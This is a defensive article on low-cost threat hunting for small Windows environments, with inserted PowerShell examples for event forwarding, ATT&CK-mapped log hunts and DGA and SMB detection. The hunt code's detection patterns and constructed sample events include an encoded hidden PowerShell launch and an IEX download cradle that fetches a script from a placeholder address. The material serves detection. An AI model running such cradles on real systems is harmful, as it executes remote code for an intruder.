

David Mashburn

Threat Hunting 101: Not Mission Impossible for the Resource-Challenged

How small and medium-sized businesses can leverage native features of the operating system and freely available, high-quality hunting resources to overcome financial limitations.

Threat hunting is widely considered an essential part of modern security operations. Its benefits include the proactive identification of threat actors already in your environment, a potential reduction in adversary dwell time, and the discovery and resolution of benign but significant issues that improve overall enterprise IT operations.

For resource-challenged organizations, threat hunting is often deemed mission impossible. It is not. Its benefits can be realized by taking a methodical approach.

The first thing to consider before starting threat-hunting activities is the maturity of your security operations. Moving from a passive, detection-oriented posture to active hunting is an exciting prospect for many defensive teams, but many organizations would be better off first improving their configuration management, patch management, and vulnerability management. Those functions are challenging even for organizations with dedicated teams in each area.

These processes are typically less mature in smaller organizations, so small or resource-constrained security teams would be well served to review their operational maturity against available guidance such as the Center for Internet Security (CIS) Critical Security Controls. The CSC helps organizations prioritize control implementation, and while threat hunting appears among its items, it is recommended only after an organization has reached a specific level of security operations maturity.

Onward to Threat Hunting
Once an organization has demonstrated effective asset management, patch management, and vulnerability management, it is better positioned to spin up threat-hunting efforts. In a typical small or medium-sized organization we usually find Windows desktops joined to an Active Directory domain, along with some cloud presence, most likely software-as-a-service. This is the type of environment in which we can explore how native capabilities can be leveraged to support threat hunting.

The lifeblood of threat hunting is security data, typically in the form of logs: network data such as firewall or web proxy logs, and endpoint data from the operating system or the endpoint security suite. To hunt effectively, data from client endpoints must be collected centrally. Given the prevalence of client-side attacks such as phishing, and the observed pattern of adversaries using compromised clients to persist and move around the environment, the critical data about adversary activity will often exist only in the endpoint logs.

Collecting endpoint logs may conjure visions of an expensive SIEM or yet another agent to deploy and manage, but this collection problem has a straightforward solution. Windows Event Forwarding (WEF), a native feature of Windows, solves endpoint log collection at a cost that will make management happy: zero. Configured through Group Policy, endpoints push selected events over WinRM to a central server running the Windows Event Collector service, which stores them in its ForwardedEvents log. For many small organizations, a single server, or even an existing low-activity server, is suitable for this role. One caveat: WEF only forwards what is audited, so check that the local audit policy actually generates the events you intend to hunt on (process creation with command lines, for example, is off by default on client systems).
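The setup described above, as an added example that is not part of the original article: a source-initiated WEF subscription built with the native wecutil, wevtutil and auditpol tools, plus the client-side settings that the Group Policy "Configure target Subscription Manager" setting would otherwise write. The collector name wef01.corp.example, the subscription name HuntingBaseline, the event selection, and the 4 GB log size are assumptions for illustration.

```powershell
# Added example (not from the article): stand up source-initiated Windows Event
# Forwarding with native tooling only. Assumed names: collector wef01.corp.example
# in domain corp.example; adjust to your environment. Run in an elevated session.

$CollectorFqdn = 'wef01.corp.example'   # assumption: your collector's FQDN

# ---------- 1. Collector ----------
function Initialize-WefCollector {
    winrm quickconfig -q                        # WinRM is the WEF transport
    wecutil qc /q                               # Windows Event Collector service owns subscriptions
    wevtutil sl ForwardedEvents /ms:4294967296  # 4 GB destination log so it does not wrap in hours

    # Source-initiated subscription: every domain computer that learns the collector's
    # address (step 2) pushes the selected events. The selection is deliberately small;
    # widen it once you know the volume the collector can absorb.
    $subscription = @'
<Subscription xmlns="http://schemas.microsoft.com/2004/06/wsman/subscription">
  <SubscriptionId>HuntingBaseline</SubscriptionId>
  <SubscriptionType>SourceInitiated</SubscriptionType>
  <Description>Endpoint events for threat hunting</Description>
  <Enabled>true</Enabled>
  <Uri>http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog</Uri>
  <ConfigurationMode>Custom</ConfigurationMode>
  <Delivery Mode="Push">
    <Batching><MaxLatencyTime>30000</MaxLatencyTime></Batching>
    <PushSettings><Heartbeat Interval="3600000"/></PushSettings>
  </Delivery>
  <Query><![CDATA[
<QueryList>
  <Query Id="0" Path="Security">
    <Select Path="Security">*[System[(EventID=4624 or EventID=4625 or EventID=4688 or EventID=4698 or EventID=4720 or EventID=4732)]]</Select>
  </Query>
  <Query Id="1" Path="System">
    <Select Path="System">*[System[(EventID=7045)]]</Select>
  </Query>
  <Query Id="2" Path="Microsoft-Windows-PowerShell/Operational">
    <Select Path="Microsoft-Windows-PowerShell/Operational">*[System[(EventID=4104)]]</Select>
  </Query>
</QueryList>
  ]]></Query>
  <ReadExistingEvents>false</ReadExistingEvents>
  <TransportName>HTTP</TransportName>
  <ContentFormat>RenderedText</ContentFormat>
  <Locale Language="en-US"/>
  <LogFile>ForwardedEvents</LogFile>
  <AllowedSourceNonDomainComputers></AllowedSourceNonDomainComputers>
  <AllowedSourceDomainComputers>O:NSG:BAD:P(A;;GA;;;DC)S:</AllowedSourceDomainComputers>
</Subscription>
'@
    $path = Join-Path $env:TEMP 'HuntingBaseline.xml'
    Set-Content -Path $path -Value $subscription -Encoding ASCII
    wecutil cs $path
}

# ---------- 2. Clients ----------
# In production set this through Group Policy (Computer Configuration > Administrative
# Templates > Windows Components > Event Forwarding > Configure target Subscription
# Manager); the policy writes exactly the registry value below. Writing it directly
# is handy for a lab or a single test machine.
function Initialize-WefClient {
    param([string]$Collector = $CollectorFqdn)
    winrm quickconfig -q

    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager'
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name '1' -Type String `
        -Value "Server=http://${Collector}:5985/wsman/SubscriptionManager/WEC,Refresh=60"

    # The forwarder runs as Network Service, which cannot read the Security log by default.
    net localgroup 'Event Log Readers' 'NT AUTHORITY\NETWORK SERVICE' /add

    # Forwarding only carries what is audited: enable process creation auditing and
    # command-line capture, otherwise 4688 events are absent or have no CommandLine.
    auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable
    $audit = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
    New-Item -Path $audit -Force | Out-Null
    Set-ItemProperty -Path $audit -Name 'ProcessCreationIncludeCmdLine_Enabled' -Type DWord -Value 1

    Restart-Service WinRM   # pick up the subscription manager and group membership now
}

# ---------- 3. Verify on the collector ----------
function Test-WefCollection {
    wecutil gr HuntingBaseline   # per-source runtime status: Active / Inactive / Disabled
    Get-WinEvent -LogName ForwardedEvents -MaxEvents 1000 |
        Group-Object MachineName | Select-Object Name, Count
}

# On the collector:  Initialize-WefCollector
# On each client:    Initialize-WefClient   (or let Group Policy do step 2)
# A few minutes later, on the collector:  Test-WefCollection
```

Two things to check before relying on the feed: `wecutil gr` lists every source that has checked in and its state, so a missing workstation is a policy or WinRM problem rather than a hunting finding; and a Security log that has been forwarding happily can still lack 4688 command lines if the audit policy in step 2 was never applied to that machine.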

Once endpoint data is centrally collected, the hunting can begin. Ideally, this data would be consolidated further into an existing SIEM or log aggregation solution to facilitate searching and correlation. If that option does not exist, there are projects that provide PowerShell scripts to analyze the forwarded log data. One example is DeepBlueCLI, authored by Eric Conrad and freely available on his GitHub profile. This set of scripts provides a basic threat-hunting capability by looking for evidence of malicious behavior in Windows event logs.

Log Data and Other Indicators
If the capability does exist to roll this data into a log correlation tool, the flexibility to hunt for different indicators expands greatly. A resource such as the MITRE ATT&CK framework can be used to look for specific behaviors from the various stages of the attack life cycle, providing a wealth of indicators on which to base the hunting process. From an endpoint perspective, this methodology is a ready way to get started with hunting in Windows event logs. Windows event logs are not, however, the only data source that can support threat hunting.
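The script-based hunting of the previous section and the ATT&CK-driven hunting of this one, as one added example that is not part of the original article and is not DeepBlueCLI: a handful of hunts over events collected in the collector's ForwardedEvents log, each tagged with the ATT&CK technique it looks for. The technique IDs, regular expressions, thresholds and the sample events are the author's own choices for illustration, not a published ruleset.

```powershell
# Added example (not from the article, not DeepBlueCLI): ATT&CK-mapped hunts over
# events forwarded to the ForwardedEvents log. Patterns and thresholds are assumptions.

function ConvertFrom-EventRecord {
    # Flatten a Get-WinEvent record so hunts key on EventData field names rather than
    # positional Properties indices, which differ between Windows builds.
    param([Parameter(Mandatory, ValueFromPipeline)] $Record)
    process {
        $xml  = [xml]$Record.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[[string]$d.Name] = [string]$d.'#text' }
        [pscustomobject]@{ Id = $Record.Id; Computer = $Record.MachineName
                           Time = $Record.TimeCreated; Data = $data }
    }
}

function Invoke-Hunts {
    param([Parameter(Mandatory)] [object[]]$Events)
    $hits = New-Object System.Collections.Generic.List[object]
    function Add-Hit($technique, $e, $evidence) {
        $hits.Add([pscustomobject]@{ Technique=$technique; Computer=$e.Computer; Time=$e.Time; Evidence=$evidence })
    }
    $office  = '(?i)\\(WINWORD|EXCEL|POWERPNT|OUTLOOK)\.EXE$'
    $shells  = '(?i)\\(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)\.exe$'
    $cradle  = '(?i)(\s-e(c|nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden|downloadstring|downloadfile|frombase64string|iex\b|invoke-expression)'
    $badpath = '(?i)\\(Users|ProgramData|Temp|AppData)\\'

    foreach ($e in $Events) {
        $d = $e.Data
        switch ($e.Id) {
            4688 {  # process creation: Office spawning a shell, and PowerShell download cradles
                if ($d.ParentProcessName -match $office -and $d.NewProcessName -match $shells) {
                    Add-Hit 'T1566.001 Spearphishing Attachment' $e "$($d.ParentProcessName) -> $($d.CommandLine)"
                }
                if ($d.CommandLine -match $cradle) { Add-Hit 'T1059.001 PowerShell' $e $d.CommandLine }
            }
            4104 { if ($d.ScriptBlockText -match $cradle) { Add-Hit 'T1059.001 PowerShell' $e $d.ScriptBlockText } }
            7045 { if ($d.ImagePath -match $badpath) { Add-Hit 'T1543.003 Windows Service' $e "$($d.ServiceName) = $($d.ImagePath)" } }
            4698 { Add-Hit 'T1053.005 Scheduled Task' $e "$($d.SubjectUserName) created $($d.TaskName)" }
        }
    }
    # Many failed logons from one source address inside the hunted window.
    $Events | Where-Object Id -eq 4625 | Group-Object { $_.Data.IpAddress } |
        Where-Object Count -ge 5 | ForEach-Object {
            $users = ($_.Group | ForEach-Object { $_.Data.TargetUserName } | Sort-Object -Unique) -join ','
            Add-Hit 'T1110 Brute Force' $_.Group[0] "$($_.Count) failures from $($_.Name) against $users"
        }
    return $hits
}

# Constructed sample events (not real data) in the flattened shape above.
$SampleEvents = @(
    [pscustomobject]@{ Id=4688; Computer='WS-017'; Time=[datetime]'2019-04-01T09:12:03'; Data=@{
        SubjectUserName='jdoe'; ParentProcessName='C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        NewProcessName='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine='powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA' } }
    [pscustomobject]@{ Id=4688; Computer='WS-017'; Time=[datetime]'2019-04-01T09:12:04'; Data=@{
        SubjectUserName='jdoe'; ParentProcessName='C:\Windows\explorer.exe'
        NewProcessName='C:\Windows\System32\notepad.exe'; CommandLine='notepad.exe' } }
    [pscustomobject]@{ Id=4104; Computer='WS-017'; Time=[datetime]'2019-04-01T09:12:05'; Data=@{
        ScriptBlockText='IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.7/a.ps1")' } }
    [pscustomobject]@{ Id=7045; Computer='SRV-FS01'; Time=[datetime]'2019-04-01T09:30:00'; Data=@{
        ServiceName='WinUpdateSvc'; ImagePath='C:\ProgramData\svc\upd.exe'; AccountName='LocalSystem' } }
)
$SampleEvents += 1..6 | ForEach-Object {
    [pscustomobject]@{ Id=4625; Computer='DC01'; Time=[datetime]'2019-04-01T02:00:00'; Data=@{
        TargetUserName="user$_"; IpAddress='10.10.5.23'; LogonType='3'; Status='0xC000006D' } } }

# Offline demonstration on the constructed sample:
Invoke-Hunts -Events $SampleEvents | Format-Table -AutoSize -Wrap

# Against the collector, last 24 hours:
# $fw = Get-WinEvent -FilterHashtable @{ LogName='ForwardedEvents'; Id=4688,4104,4625,4698,7045;
#                                        StartTime=(Get-Date).AddDays(-1) } | ConvertFrom-EventRecord
# Invoke-Hunts -Events $fw | Format-Table -AutoSize -Wrap
```

On the sample this yields five findings: the Word-spawned hidden, encoded PowerShell (two hits, one per technique), the script block download cradle, the service installed from ProgramData, and the six failures from one address. Expect the 4688 and 7045 hunts to need tuning on real data; legitimate software installers and admin scripts will trip both, and the point of hunting is to baseline what is normal for your environment before treating a hit as an incident.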

Network data is another essential source for finding indications of adversary activity in your environment. NetFlow, firewall logs, proxy logs, DNS logs, and DHCP logs can all play a role in threat hunting. Collecting these log types may be harder in some environments because of access issues, the performance overhead of generating them, and the difficulty of analyzing the data effectively. Still, these sources are rich in signs of threat actors: unusual user-agent strings, unusual data volumes or destination IP addresses, unusual client-to-client flows for specific protocols such as SMB, odd hostnames or MAC addresses in DHCP leases, and indications of domain generation algorithms (DGAs) in DNS queries, certificate names, and URLs. These are only a few of the indicators available, but they can be highly effective components of a successful hunt.
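Two of the network indicators listed above, as an added example that is not part of the original article: DGA-like names in DNS logs and client-to-client SMB in firewall logs. The log lines are constructed in a simplified CSV form (timestamp, client, query name, response code; and timestamp, source, destination, destination port, action) so the example runs offline; adapt the two parsers to your resolver's and firewall's real export formats. The entropy and length thresholds and the 10.10.0.0/16 workstation range are assumptions.

```powershell
# Added example (not from the article): network-side hunts over constructed log lines.
# Log formats, thresholds and address ranges are assumptions for illustration.

function Get-ShannonEntropy {
    # Bits per character of a string; random-looking DGA labels score near 4, words near 3.
    param([Parameter(Mandatory)] [string]$Text)
    $counts = @{}
    foreach ($c in $Text.ToCharArray()) { $counts[$c] = 1 + [int]$counts[$c] }
    $h = 0.0
    foreach ($n in $counts.Values) { $p = $n / $Text.Length; $h -= $p * [math]::Log($p, 2) }
    [math]::Round($h, 2)
}

function Find-DgaCandidates {
    # Flags clients that resolve several long, high-entropy names. One odd-looking name is
    # noise (CDNs, tracking hosts); a burst of them, mostly NXDOMAIN, is the DGA signature.
    param([string[]]$DnsLines, [int]$MinLength = 12, [double]$MinEntropy = 3.5, [int]$MinPerClient = 3)
    $odd = foreach ($line in $DnsLines) {
        $time, $client, $qname, $rcode = $line -split ','
        $labels = $qname.TrimEnd('.') -split '\.'
        if ($labels.Count -lt 2) { continue }
        $sld = $labels[-2]   # naive registrable label; use a public-suffix list for co.uk-style TLDs
        $h = Get-ShannonEntropy $sld
        if ($sld.Length -ge $MinLength -and $h -ge $MinEntropy) {
            [pscustomobject]@{ Client=$client; Name=$qname; Entropy=$h; Rcode=$rcode }
        }
    }
    $odd | Group-Object Client | Where-Object Count -ge $MinPerClient | ForEach-Object {
        [pscustomobject]@{ Client=$_.Name; Names=$_.Count
                           Nxdomain=@($_.Group | Where-Object Rcode -eq 'NXDOMAIN').Count
                           Sample=($_.Group | Select-Object -First 3 -ExpandProperty Name) -join ' ' }
    }
}

function Find-ClientToClientSmb {
    # Workstations talk SMB to file servers and domain controllers, not to each other;
    # peer-to-peer 445 is a classic lateral-movement tell (admin shares, PsExec-style tools).
    param([string[]]$FirewallLines, [string]$WorkstationPrefix = '10.10.')
    foreach ($line in $FirewallLines) {
        $time, $src, $dst, $dport, $action = $line -split ','
        if ($dport -eq '445' -and $src.StartsWith($WorkstationPrefix) -and $dst.StartsWith($WorkstationPrefix)) {
            [pscustomobject]@{ Time=$time; Source=$src; Destination=$dst; Action=$action }
        }
    }
}

# Constructed sample data (not real traffic).
$DnsLog = @(
    '2019-04-01T10:00:01,10.10.5.23,www.microsoft.com.,NOERROR'
    '2019-04-01T10:00:02,10.10.5.23,xk3f9qzlw7bvh2pd.com.,NXDOMAIN'
    '2019-04-01T10:00:02,10.10.5.23,qmxzvtklpwoehrby.net.,NXDOMAIN'
    '2019-04-01T10:00:03,10.10.5.23,hj4rt8wqzxcvbn2m.org.,NXDOMAIN'
    '2019-04-01T10:00:03,10.10.5.23,lh3.googleusercontent.com.,NOERROR'
    '2019-04-01T10:00:04,10.10.7.41,mail.corp.example.,NOERROR'
)
$FwLog = @(
    '2019-04-01T10:05:00,10.10.5.23,10.20.1.10,445,allow'   # workstation -> file server: normal
    '2019-04-01T10:05:07,10.10.5.23,10.10.7.41,445,allow'   # workstation -> workstation: hunt this
    '2019-04-01T10:05:09,10.10.5.23,10.10.7.41,135,allow'
)

Find-DgaCandidates -DnsLines $DnsLog | Format-Table -AutoSize
Find-ClientToClientSmb -FirewallLines $FwLog | Format-Table -AutoSize
```

On the sample, 10.10.5.23 is reported with three high-entropy names, all NXDOMAIN, while googleusercontent (entropy about 3.2) stays below the threshold; the SMB hunt returns the single 10.10.5.23 to 10.10.7.41 flow. The same entropy function applies to the certificate common names and URLs the paragraph mentions when those are available from proxy or TLS inspection logs, and the client-to-client check generalizes to other protocols that should only run client-to-server, such as RDP and WinRM.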

Threat hunting can be performed effectively in smaller or resource-constrained environments. Leveraging native features of the operating system and freely available, high-quality hunting resources can overcome financial limitations. Staffing constraints are harder to address, but prioritizing security tasks by the value they offer the organization will determine how much time can be allocated to threat hunting.

If you wish to learn more about threat hunting, David Mashburn will be giving a talk on this subject "Hunting Highs and Lows: Misadventures in Threat Hunting" at SANS Pittsburgh in July, or you can research these concepts online.


David Mashburn is a SANS Certified Instructor and an IT Security Manager for a global non-profit organization in the Washington, D.C. area. He has experience working as an IT security professional for several civilian federal agencies, and over 15 years of experience in IT.

4/16/2019 | 5:05:32 AM
Dig deeper
There are always a thousand and one ways to handle any given situation if we look far enough. We need to first take note of what the root of the problem is before drilling into possible solutions. We can never rectify the issue if we were to focus solely on the surface which is already chaotic enough.